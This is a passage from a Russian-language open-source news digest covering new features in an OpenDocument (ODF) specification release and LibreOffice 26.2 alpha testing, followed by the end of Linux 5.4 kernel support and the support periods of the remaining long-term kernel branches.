• В электронных таблицах: Разрешено использование цвета текста и цвета фона ячейки в качестве критериев в фильтрах. Добавлена функция EASTERSUNDAY для вычисления даты Пасхи и связанных с ней церковных праздников.
• В диаграммах повышена гибкость расстановки меток осей и разрешено указание основания логарифмической шкалы.
• При встраивании формул разрешено использовать все версии языка формул MathML.

Спецификация состоит из четырёх частей:

• Часть 1, введение;
• Часть 2, описывает модель упаковки данных в ODF-контейнер;
• Часть 3, описывает общую схему ODF.
• Часть 4, определяет формат описания формул OpenFormula

Дополнительно можно отметить начало альфа-тестирования офисного пакета LibreOffice 26.2, релиз которого запланирован на февраль 2026 года. Из наиболее заметных новшеств: поддержка импорта и экспорта в формате Markdown, возможность использования горизонтальных вкладок в интерфейсе, расширение возможностей отслеживания изменений в документах, поддержка формата Biff12 для переноса данных через буфер обмена из Excel, расширение диалога сортировки в Calc, поддержка маппинга документов XML и JSON с таблицами в Calc, ускорение отрисовки фигур.

1. Главная ссылка к новости
2. OpenNews: Microsoft обеспечил поддержку открытого формата ODF 1.3 в MS Office 2021
3. OpenNews: Формат ODF утверждён в качестве национального стандарта России
4. OpenNews: Развивающий OpenDocument консорциум OASIS получил аккредитацию для быстрого продвижения стандартов
5. OpenNews: Формат Open Document 1.2 признан международным стандартом
6. OpenNews: Консорциум OASIS утвердил OpenDocument 1.3 в качестве стандарта

Одновременно объявлено о завершении цикла сопровождения ветки ядра Linux 5.4, для которой опубликован финальный выпуск 5.4.302 (больше в серии 5.4.x обновления публиковаться не будут). Ветка 5.4 была сформирована в ноябре 2019 года, сопровождалась 6 лет и использовалась в Ubuntu 20.04 LTS и в Oracle Unbreakable Enterprise Kernel 6. Продукты, поставляемые с ядром 5.4, рекомендуется перевести на более актуальные LTS-выпуски.

Продолжается сопровождение longterm-веток:

• 6.12 - до декабря 2026 г. (используется в Debian 13, SUSE 16, Android 16 и Oracle Unbreakable Enterprise Kernel 8).
• 6.6 - до декабря 2026 г. (используется в OpenWRT 24.10).
• 6.1 - до декабря 2027 г. (используется в Debian 12).
• 5.15 - до октября 2026 г. (используется в Ubuntu 22.04, Oracle Unbreakable Enterprise Kernel 7 и OpenWRT 23.05).
• 5.10 - до декабря 2026 г. (используется в Debian 11, Android 12 и OpenWRT 22).

Отдельно на базе ядер 4.4, 4.19, 5.10, 6.1 и 6.12 организацией Linux Foundation предоставляются ветки SLTS (Super Long Term Support), которые сопровождаются отдельно и поддерживаются 10-20 лет. Сопровождение SLTS-веток осуществляется в рамках проекта Civil Infrastructure Platform (CIP), в котором участвуют такие компании, как Toshiba, Siemens, Renesas, Bosch, Hitachi и MOXA, а также вовлечены мэйнтейнеры LTS-веток основного ядра, разработчики Debian и создатели проекта KernelCI. Ядра SLTS ориентированы на применение в технических системах гражданской инфраструктуры и в важных промышленных системах.

1. Главная ссылка к новости
2. OpenNews: Релиз ядра Linux 6.18
3. OpenNews: Сокращение срока поддержки LTS-ядер Linux и проблема с выгоранием сопровождающих
4. OpenNews: Ядро Linux 6.1 будет поддерживаться 10 лет
5. OpenNews: Ядро Linux 6.6 отнесено к категории выпусков с длительным сроком поддержки
6. OpenNews: Ядро Linux 6.12 отнесено к категории выпусков с длительным сроком поддержки